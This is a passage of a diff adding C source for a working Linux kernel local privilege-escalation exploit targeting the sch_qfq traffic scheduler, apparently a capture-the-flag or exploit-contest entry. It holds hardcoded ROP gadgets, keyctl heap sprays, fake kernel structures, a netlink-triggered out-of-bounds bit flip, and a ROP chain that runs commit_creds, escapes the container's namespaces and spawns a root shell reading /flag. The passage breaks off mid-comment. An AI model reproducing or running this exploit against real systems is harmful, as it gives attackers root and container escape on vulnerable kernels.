pop rcx; ret // 59c3 +u64 pop_rsi = 0xffffffff8100256c; // pop rsi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5ee9ce1e4001c3 +u64 pop_rdi = 0xffffffff81002cd5; // pop rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5fe97e094001c3 + +u64 mov_rax_rdi_jmp_zen_ret = 0xffffffff810fdd45; // mov rax, rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 4889f8e991414001c3 + +u64 push_rsi_jmp_rsi_0x39 = 0xffffffff8198915b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639 +u64 pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret = 0xffffffff810e8603; // pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5c4883c4185b5d415ce94f4d3c01c3 +u64 mov_rsp_rbp_pop_rbp_ret = 0xffffffff8112cf2c; // mov rsp, rbp; pop rbp; ret // 4889ec5dc3 + +// } GADGETS + +#define FOR_ALL_OFFSETS(x) do { \ + x(cls_rsvp_ops); \ + x(find_task_by_vpid); \ + x(switch_task_namespaces); \ + x(commit_creds); \ + x(prepare_kernel_cred); \ + x(init_task); \ + x(init_nsproxy); \ + x(___trampoline_start_iretq); \ + x(mov_rdi_rax); \ + x(pop_rcx_ret); \ + x(pop_rsi); \ + x(pop_rdi); \ + x(mov_rax_rdi_jmp_zen_ret); \ + x(push_rsi_jmp_rsi_0x39); \ + x(pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret); \ + x(mov_rsp_rbp_pop_rbp_ret); \ + } while(0) + +// Reverse calculation of the index in sch_qfq.c:qfq_calc_index +// Our desired index will be 27 so that the fake group resides at offset 288 into +// our large spray object. 
+#define _TARGET_INDEX 27 +#define _MIN_SLOT_SHIFT 25 +#define _NUM_CLS 1 +#define _CLS_WEIGHT 1 +#define _ONE_FP 0x40000000 +#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1 + 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS) + +#define SPRAY_8192 1 +#define SPRAY_128 2 + +#define SIZEOF_USER_KEY_PAYLOAD 24 + +struct list_head { + struct list_head * next; /* 0 8 */ + struct list_head * prev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct hlist_node { + struct hlist_node * next; /* 0 8 */ + struct hlist_node * * pprev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct qfq_aggregate_partial { + // struct hlist_node next; /* 0 16 */ + // u64 S; /* 16 8 */ + u64 F; /* 24 8 */ + struct qfq_group * grp; /* 32 8 */ + u32 class_weight; /* 40 4 */ + int lmax; /* 44 4 */ + u32 inv_w; /* 48 4 */ + u32 budgetmax; /* 52 4 */ + u32 initial_budget; /* 56 4 */ + u32 budget; /* 60 4 */ + /* --- cacheline 1 boundary (64 bytes) --- */ + int num_classes; /* 64 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + struct list_head active; /* 72 16 */ + struct hlist_node nonfull_next; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 100, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; +_Static_assert(sizeof(struct qfq_aggregate_partial) == 104 - SIZEOF_USER_KEY_PAYLOAD); + +struct tcf_proto_partial { + // void* next; /* 0 8 */ + // void * root; /* 8 8 */ + // int (*classify)(struct sk_buff *, const struct tcf_proto *, struct tcf_result *); /* 16 8 */ + u16 protocol; /* 24 2 */ + + /* XXX 2 bytes hole, try to pack */ + u8 __pad0[2]; + + u32 prio; /* 28 4 */ + void * data; /* 32 8 */ + const void * ops; /* 40 8 */ + struct tcf_chain * chain; /* 48 8 */ + u32 lock; /* 56 4 */ + u8 deleting; /* 60 1 */ + + /* XXX 3 bytes hole, try to pack */ + u8 __pad1[3]; + + /* --- cacheline 1 boundary (64 bytes) --- */ + u32 refcnt; /* 64 4 */ + + /* XXX 4 bytes hole, try to pack */ + u8 __pad2[4]; + + u8 rcu[16]; + struct hlist_node destroy_ht_node; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 95, holes: 3, sum holes: 9 */ + /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; +_Static_assert(sizeof(struct tcf_proto_partial) == 104 - SIZEOF_USER_KEY_PAYLOAD); + + +struct tcf_proto_ops { + struct list_head head; /* 0 16 */ + char kind[16]; /* 16 16 */ + int (*classify)(void*, const void*, void*); /* 32 8 */ + int (*init)(void*); /* 40 8 */ + void (*destroy)(void*, u8, void*); /* 48 8 */ + void * (*get)(void*, u32); /* 56 8 */ + /* --- cacheline 1 boundary (64 bytes) --- */ + void (*put)(void*, void *); /* 64 8 */ + int (*change)(void*, void*, void*, long unsigned int, u32, void**, void **, u32, void*); /* 72 8 */ + int (*delete)(void*, void*, u8*, u8, void*); /* 80 8 */ + u8 (*delete_empty)(void*); /* 88 8 */ + void (*walk)(void*, void*, u8); /* 96 8 */ + int (*reoffload)(void*, u8, void *, void *, void*); /* 104 8 */ + void (*hw_add)(void*, void *); /* 112 8 */ + void (*hw_del)(void*, void *); /* 120 8 */ + /* --- cacheline 2 boundary (128 bytes) --- */ + void (*bind_class)(void *, u32, long unsigned int, void *, long unsigned int); /* 128 8 */ + void * (*tmplt_create)(void*, void*, void**, void*); /* 136 8 */ + void (*tmplt_destroy)(void *); /* 144 8 */ + int (*dump)(void*, void*, void *, void*, void*, u8); /* 152 8 */ + int (*terse_dump)(void*, void*, void *, 
void*, void*, u8); /* 160 8 */ + int (*tmplt_dump)(void*, void*, void *); /* 168 8 */ + struct module * owner; /* 176 8 */ + int flags; /* 184 4 */ + + /* size: 192, cachelines: 3, members: 22 */ + /* padding: 4 */ +} PACK; + +struct hlist_head { + struct hlist_node * first; /* 0 8 */ + + /* size: 8, cachelines: 1, members: 1 */ + /* last cacheline: 8 bytes */ +}; + +struct qfq_group { + u64 S; /* 0 8 */ + u64 F; /* 8 8 */ + unsigned int slot_shift; /* 16 4 */ + unsigned int index; /* 20 4 */ + unsigned int front; /* 24 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + long unsigned int full_slots; /* 32 8 */ + struct hlist_head slots[32]; /* 40 256 */ + + /* size: 296, cachelines: 5, members: 7 */ + /* sum members: 292, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; + +typedef i32 key_serial_t; + +struct key { + key_serial_t id; + int type; +}; + +long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5); + +struct rop_payload_head { + struct tcf_proto_ops ops; + u8 stack[0]; +} PACK; + +// Large spray payload (kmalloc-8192) +// This will host the fake qfq_group object in stage 1 +// Eventually it will contain both the prepared stack and the tcf_proto_ops +// which the fake tcf_proto will reference +struct key_payload_large { + struct { + u8 __pad02[288 - SIZEOF_USER_KEY_PAYLOAD]; + struct qfq_group group; + } PACK; + struct rop_payload_head rop; + u8 __pad2[4097 - sizeof(struct qfq_group) - 288 - sizeof(struct rop_payload_head)]; +} PACK; +_Static_assert(sizeof(struct key_payload_large) == 4097 - SIZEOF_USER_KEY_PAYLOAD); +_Static_assert(__builtin_offsetof(struct key_payload_large, group) == 0x108); + +// Small spray payload (104 bytes) +// Used for fake qfq_aggregate as well as fake tcf_proto +// In the case of tcf_proto, we overlay the structure with +// a temporary stack from which we will eventually pivot into +// the larger stack prepared in the larger payload. +// The stack is carefully crafted to not interfere with the rest +// of the structure. +struct key_payload_small { + union { + struct qfq_aggregate_partial agg; + union { + struct tcf_proto_partial tp; + struct { + // payload for pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; ret + u8 __pad0[0x18 - SIZEOF_USER_KEY_PAYLOAD]; + u64 scratch_rbx; + u64 rbp; + u64 scratch_r12; + u64 stack[1]; + } PACK; + struct { + // payload for push rsi; jmp qword ptr [rsi+0x39] + u8 __pad1[0x39 - SIZEOF_USER_KEY_PAYLOAD]; + u64 jmp_target; + } PACK; + }; + }; +} PACK; +_Static_assert(sizeof(struct key_payload_small) == 104 - SIZEOF_USER_KEY_PAYLOAD); + +// key_ctl will be a bit sketchy because of our multi - process exploit. +// These functions will proxy calls through to a child process which possesses +// all the keys. 
+int spray(int type, int n, void* payload, size_t plen); +int spray_reset(); +int spray_reset_except(struct key* ids, size_t num_ids); +int spray_exit(); + +const struct key* get_key(unsigned index); + +static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +int final_stage_pid = 0; +void* final_stage_stack = NULL; + +static struct key_payload_small agg; // SPRAY_128 +static struct key_payload_large large; // SPRAY_8192 +static key_serial_t id_agg; +static key_serial_t id_large; + +static u64 leak_agg_ptr = 0; +static u64 leak_grp_ptr = 0; +static u64 leak_cls_rsvp_ops = 0; + +static u8* rop_payload = NULL; +static u32 rop_payload_size = 0; + +static u8* scratch_buf = NULL; + +#ifndef DO_BEFORE +#define DO_BEFORE 1 +#endif + +#ifndef ATTEMPT_LARGE_EVERY +#define ATTEMPT_LARGE_EVERY 17 +#endif +#ifndef ATTEMPT_SMALL_EVERY +#define ATTEMPT_SMALL_EVERY 27 +#endif + +static char* shell_argv[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, +}; + +void shell() { + L("escape .."); + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + L("spawning shell .."); + execve(shell_argv[0], shell_argv, NULL); + exit(1); +} + +void prep_agg_payload(struct qfq_aggregate_partial* agg, u64 marker, u32 lmax) { + memset(agg, 0, sizeof(*agg)); + + agg->F = marker; // marker, dont-care + agg->grp = NULL; + agg->class_weight = 1; + agg->lmax = lmax; + agg->inv_w = 0; // dont-care + agg->budgetmax = 0; // dont-care + agg->initial_budget = 0; // dont-care + agg->budget = 0; // dont-care + agg->num_classes = 0; // so that we will free this on class deletion + + // iff we add a new class for this fake agg, keeping this NULL should be fine. + // otherwise we would have to pass the following in qfq_add_to_agg: + // + // if (cl->qdisc->q.qlen > 0) { /* adding an active class */ + // list_add_tail(&cl->alist, &agg->active); + // if (list_first_entry(&agg->active, struct qfq_class, alist) == + // cl && q->in_serv_agg != agg) /* agg was inactive */ + // qfq_activate_agg(q, agg, enqueue); /* schedule agg */ + // } + // + // this seems complicated, so we just avoid it. + agg->active.next = NULL; + agg->active.prev = NULL; + + // this should be the first agg in list, thus keeping those NULL should be fine. + // we need to pass this list op in qfq_find_agg: + // + // hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next) + // if (agg->lmax == lmax && agg->class_weight == weight) + // return agg; + // + agg->nonfull_next.next = NULL; + agg->nonfull_next.pprev = NULL; +} + +void prep_tcf_proto_payload(struct key_payload_small* p) { + memset(p, 0, sizeof(*p)); + + p->tp.protocol = 0xdead; + p->tp.prio = 0x22220000; + p->tp.ops = (void*)(leak_grp_ptr + __builtin_offsetof(struct key_payload_large, rop.ops) + SIZEOF_USER_KEY_PAYLOAD); + + // interleaved stack, pivot to larger stack in 8192 buffer + p->rbp = (leak_grp_ptr + __builtin_offsetof(struct key_payload_large, rop.stack) + SIZEOF_USER_KEY_PAYLOAD); + p->stack[0] = mov_rsp_rbp_pop_rbp_ret; + + // first pivot to the interleaved stack + p->jmp_target = pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret; + + // This refcount is on top of one of our gadgets. It will be incremented on trigger + p->tp.refcnt -= 1; +} + +void prep_stage1_large_payload(struct key_payload_large* large) { + memset(large, 0, sizeof(*large)); + + // This index will control the bit we flip. 
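+    // sch_qfq.c uses grp->index for __set_bit()/__clear_bit() on q->bitmaps,
+    // so an oversized index turns those into an OOB bit flip; we aim at bit
+    // 0x80 of the first byte of qfq_sched->nonfull_aggs: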
+ // (offsetof(struct qfq_sch, nonfull_aggs) - offsetof(struct qfq_sch, bitmaps)) * 8 + (FFS(0x80) = 7) + large->group.index = 7440 * 8 + 7; +} + +void prep_final_large_payload(struct key_payload_large* large) { + memset(large, 0, sizeof(*large)); + + u64 cs; + u64 ss; + asm( + "movq %%cs, %0;" + "movq %%ss, %1;" + : "=r"(cs), "=r"(ss) + ); + + u8 rop[] = { + pad8('R'), // rbp + p64(pop_rdi), + p64(init_task), + p64(prepare_kernel_cred), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(commit_creds), + + p64(pop_rdi), + p64(1), + p64(find_task_by_vpid), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(pop_rsi), + p64(init_nsproxy), + p64(switch_task_namespaces), + + p64(___trampoline_start_iretq), + + pad8('A'), // rax; + pad8('I'), // rdi; + + p64((u64)&shell), + p64(cs), + p64(0), // flags + p64((u64)(scratch_buf + 0x4000)), // rsp + p64(ss), + }; + + strcpy(large->rop.ops.kind, "exploit"); + large->rop.ops.get = (void*)mov_rax_rdi_jmp_zen_ret; + large->rop.ops.dump = (void*)push_rsi_jmp_rsi_0x39; + + memcpy(large->rop.stack, rop, sizeof(rop)); +} + +int read_key(key_serial_t id, void* buf, u32 buflen) { + if (scratch_buf == NULL) { + return -1; + } + + int keylen = keyctl(KEYCTL_READ, id, (unsigned long)scratch_buf, 0x10000, 0); + if (keylen < 0) { + return keylen; + } + + memcpy(buf, scratch_buf, buflen < keylen ? buflen : keylen); + + return keylen; +} + +static int last_worker = 0; +static struct { + int pid; + void* stack; +} workers[200] = {0}; + +int spawn_worker(int (*target)(void*), void* arg) { + void* stack = workers[last_worker].stack; + + if (stack == NULL) { + stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(stack == MAP_FAILED); + workers[last_worker].stack = stack; + } + + int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg); + + if (child < 0) { + return -1; + } + + workers[last_worker].pid = child; + last_worker++; + + return last_worker - 1; +} + +int kill_worker(int index) { + if (workers[index].pid > 0) { + kill(workers[index].pid, SIGKILL); + workers[index].pid = -1; + + if (index == last_worker - 1) { + last_worker--; + } + + return 0; + } + + E("worker %d does not exist?", index); + return -1; +} + +int netlink_errno(int fd, struct nlmsghdr* nlh) { + assert(nlh->nlmsg_type == NLMSG_ERROR); + struct nlmsgerr* e = NLMSG_DATA(nlh); + assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*e))); + + if (e->error != 0) { + E("netlink error: %d", e->error); + errno = -e->error; + } + + return e->error; +} + +int netlink_send_recv(int fd, void* buf, int size) { + struct iovec iov = { + .iov_base = buf, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + msg.msg_flags = MSG_TRUNC; + msg.msg_iov = NULL; + msg.msg_iovlen = 0; + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC); + if (iov.iov_len < 0) { + perror("recvmsg()"); + return -1; + } + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +volatile int wake = 0; +volatile int done = 0; +// event which will be set whenever control is handed over back to main +static EVENT_DEFINE(parent_notify, __EVENT_UNSET); +// event which will be set 
whenever control is handed over back to the final stage worker +static EVENT_DEFINE(final_worker_notify, __EVENT_UNSET); + +int prepare_device(int s, int ifindex) { + struct nlmsghdr* nlh = calloc(1, 4096); + FAIL_IF(nlh == NULL); + + struct ifinfomsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + // Up the device + data->ifi_family = PF_UNSPEC; + data->ifi_type = 0; + data->ifi_index = ifindex; + data->ifi_flags = IFF_UP; + data->ifi_change = 1; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + attr->nla_type = IFLA_MTU; + attr->nla_len = NLA_HDRLEN + 4; + u32* attr_data = (void*)attr + NLA_HDRLEN; + *attr_data = 0x1000; + + nlh->nlmsg_len += attr->nla_len; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to prepare device!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a rsvp tcfilter, used to spray our tcf_proto object +int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) { + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTFILTER; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = 0; + + u16 protocol = 8; + data->tcm_info = ((u32)prio << 16) | (u32)protocol; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "rsvp"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + int err = netlink_errno(s, nlh); + + // This sometimes shows EBUSY, but it still works? + // We just ignore the error, ... 
+ if (err != -EBUSY && err != 0) { + E("failed to create tcfilter!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic +int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(2, 8192); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "netem"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt); + + struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN; + netem_qopt->latency = 1000u * 1000 * 5000; // latency in us + // this limit is important: + // we want the first packet to be delayed indefinitely, but + // the second packet, which triggers the vuln, to be dropped. + netem_qopt->limit = 1; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create netem qdisc!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a qfq qdisc, main qdisc of interest +int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle, int with_stab) { + struct nlmsghdr* nlh = calloc(1, 4096); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "qfq"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + if (with_stab) { + // Prepare the sizetable. This sizetable is used to trigger + // the vulnerability. + // Essentially we setup a lookup table where the resulting + // packet size equals to (table[in_size >> 9] << 7) + // We choose those bitshifts to have some room for packet headers + // that we do not have to care about. 
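+            // Concretely: qdisc_pkt_len = stab[len >> cell_log] << size_log,
+            // so a 512-byte send hits stab[1] = LMAX >> 7 and is accounted
+            // as LMAX (0x400000) bytes at enqueue time.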
+ attr->nla_type = TCA_STAB; + attr->nla_len = NLA_HDRLEN; + + struct nlattr* nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_STAB_BASE; + nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec); + attr->nla_len += nested->nla_len; + + struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN; + sizespec->cell_log = 9; + sizespec->size_log = 7; + sizespec->cell_align = 0; + sizespec->overhead = 0; + sizespec->linklayer = 0; + sizespec->mpu = 0; + sizespec->mtu = 0; + sizespec->tsize = 2; + + nested = (void*)nested + nested->nla_len; + nested->nla_type = TCA_STAB_DATA; + nested->nla_len = NLA_HDRLEN + 2 * sizeof(u16); + attr->nla_len += nested->nla_len; + + *((u16*)((void*)nested + NLA_HDRLEN) + 0) = 0; + // This is the size that triggers the vulnerability + *((u16*)((void*)nested + NLA_HDRLEN) + 1) = LMAX >> 7; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create qfq qdisc!"); + free(nlh); + return -1; + } + +free(nlh); +return 0; +} + +// Delete a class from a qdisc +int delete_class(int s, int ifindex, u32 handle) { + L("deleting class %x", handle); + + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_DELTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to delete class!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Add a helper class to a qdisc +int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) { + struct nlmsghdr* nlh = calloc(1, 4096); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = class_handle; + + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + struct nlattr* nested; + + do { + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN + NLA_HDRLEN + sizeof(u32); + + nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_QFQ_LMAX; + nested->nla_len = NLA_HDRLEN + sizeof(u32); + *(u32*)((void*)nested + NLA_HDRLEN) = lmax; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create helper class!"); + free(nlh); + return -1; + } + free(nlh); + + if (sub_qdisc_handle != 0) { + return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle); + } + + return 0; +} + + +// Worker to spray qdiscs and potentially trigger the vulnerabilty. +// Each worker will have its own network namespace and create qdiscs +// for the loopback device. 
+// We could create virtual devices, but here we are. +int bug_worker(void* arg) { + int i = *(int*)arg; + + const u32 handle = 0x10000000 | (i << 16); + const u32 handle_oob = handle | (1 << 0); + const u32 handle_help = handle | (1 << 1); + const u32 handle_faked1 = handle | (1 << 2); + + const u32 sub_handle_help = 0x20010000; + const u32 sub_handle_oob = 0x20020000; + + const int loindex = if_nametoindex("lo"); + + int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + FAIL_IF(s < 0); + + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + if (prepare_device(s, loindex) < 0) { + return -1; + } + + // Prepare qfq qdisc without anything else. + // Eventually we will create everything of interest when we pull the trigger. + // Until that this qdisc serves as some kind of "grooming" object + // Note that this qdisc is created with a specifically chosen TCA_STAB + // so that we can trigger the vulnerability. + if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle, 1) < 0) { + return -1; + } + + EVENT_SET(parent_notify); + + while (!done) { + while (wake != i) { + sleep(1); + } + wake = 0; + + L("worker %d is entering stage 1: trigger vulnerability", i); + + L("trying to prepare helper class .."); + // This is a real helper class: We use it to make the code below follow + // certain paths in sch_qfq.c + // We require the following: + // - qfq_sch->in_serv_agg != NULL + // - qfq_sch->in_serv_agg != OOB agg + // We use a netem qdisc with a large delay to consistently hit the window + // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset. + if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) { + E("failed to create helper class :("); + return -1; + } + + L("trying to prepare oob class .."); + // Class which will carry the aggregate with the OOB group + // In order to hit the desired update code paths, this class needs + // packets in its (sub)qdisc. Additionally we ideally want to drop the + // packet that causes the OOB group to be created. + // We use the same netem qdisc for this, additionally the netem qdisc will + // have a limit of 1 dropping all packets after the first one. 
+ if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) { + E("failed to create oob class :("); + return -1; + } + + L("activating helper agg .."); + u8 buf[1 << 9] = {0}; + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // set in_serv_agg = helper agg + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // make (not-yet) oob class active + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + L("spraying some fake qfq_aggregate .."); + prep_agg_payload(&agg.agg, 0x10000000000001, 0x1337); + FAIL_IF(spray(SPRAY_128, ATTEMPT_SMALL_EVERY, &agg, sizeof(agg)) < 0); + + // trigger vulnerability + // note that this packet will be dropped by the child (netem) qdisc + FAIL_IF(sendto(sc, buf, 1 << 9, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + L("spraying some more fake qfq_aggregate .."); + FAIL_IF(spray(SPRAY_128, ATTEMPT_SMALL_EVERY, &agg, sizeof(agg)) < 0); + + close(ss); + close(sc); + + L("waking parent"); + EVENT_SET(parent_notify); + + while (wake != i) { + sleep(1); + } + wake = 0; + + // At this stage the vulnerability should have flipped a bit of qfq_sch->nonfull_aggs + // pointing to one of our fake aggregates sprayed above. + // We will now try to create a class using this 